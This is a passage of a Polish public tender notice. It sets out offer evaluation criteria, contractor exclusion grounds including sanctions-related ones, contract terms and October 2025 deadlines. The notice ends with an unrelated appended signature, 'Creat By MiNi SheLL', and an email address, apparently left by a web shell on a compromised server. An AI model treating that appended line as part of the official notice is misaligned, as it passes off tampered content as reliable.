osobę bezrobotną w rozumieniu ustawy z dnia 20<br/>kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy lub jedną osobę z niepełnosprawnością w rozumieniu ustawy z<br/>dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych.<br/>W przypadku nie złożenia ww. deklaracji o zatrudnieniu wskazanych przez Zamawiającego osób zagrożonych wykluczeniem<br/>społecznym Wykonawca nie otrzyma punktów w tym kryterium.<br/>Zatrudnienie, o którym mowa powyżej powinno nastąpić przed podpisaniem umowy z Zamawiającym i trwać do końca realizacji tego<br/>zamówienia.<br/>Przez „zatrudnienie do realizacji zamówienia” Zamawiający rozumie zatrudnienie do realizacji zamówienia nowej osoby nie będącej<br/>aktualnie pracownikiem Wykonawcy/Podwykonawcy.<br/>W stosunku do osób, które posiadały status osoby bezrobotnej Zamawiający dopuszcza zatrudnienie tej osoby u<br/>Wykonawcy/Podwykonawcy w okresie nie wcześniejszym niż pół roku przed upływem terminu składania ofert w postępowaniu.<br/>Osoba z niepełnosprawnościami to osoba spełniająca warunki uzyskania statusu niepełnosprawności określone w ustawie z dnia 27<br/>sierpnia 1997 r. o rehabilitacji zawodowej społecznej oraz zatrudnianiu osób niepełnosprawnych lub we właściwych przepisach<br/>państw członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego lub państw, z którymi UE zawarła umowy o<br/>równym traktowaniu przedsiębiorców dostępie do zamówień publicznych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny - integracja społeczna i zawodowa osób z grup zagrożonych wykluczeniem społecznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5)ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U.2024.1616t.j.), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik<br/>nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - załącznik nr 4<br/>do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy działający wspólnie:<br/>• jeżeli ofertę składa kilku wykonawców działających wspólnie, obowiązani są ustanowić wspólnego pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego – do pełnomocnictwa stosuje się w szczególności przepisy Kodeksu<br/>Cywilnego,<br/>• pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z<br/>wykonawców),<br/>• jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to może on działać zgodnie z<br/>ujawnionymi w dokumentach rejestrowych zasadami reprezentacji <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian zawarty w § 8 Zmiany umowy - załącznik nr 2.1 do SWZ /Projektowane postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-22 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych w art. 108 ust. 1ustawy Pzp (przesłanki obligatoryjne).<br/>2. Zamawiający nie przewiduje fakultatywnych przesłanek wykluczenia określonych w art. 109ustawy Pzp<br/>3. Wykluczenie Wykonawcy następuje zgodnie z art. 111Pzp.<br/>4. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/>5. Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 jeżeli zachodzą<br/>przesłanki, o których mowa w art. 110 ust. 2PZP.<br/>6. Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2025.514t.j.), zwanej dalej<br/>UPWAU, z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo<br/>wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/>art. 1 pkt 3 UPWAU;<br/>2) Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz.U.2023.1124t.j.) jest osoba wymieniona w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UPWAU;<br/>3) Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości ( Dz.U.2023.120t.j.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r.,<br/>o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 UPWAU.<br/>7. Wykluczenie, o którym mowa w ust. 5 następować będzie na okres trwania ww. okoliczności.

Creat By MiNi SheLL
Email: jattceo@gmail.com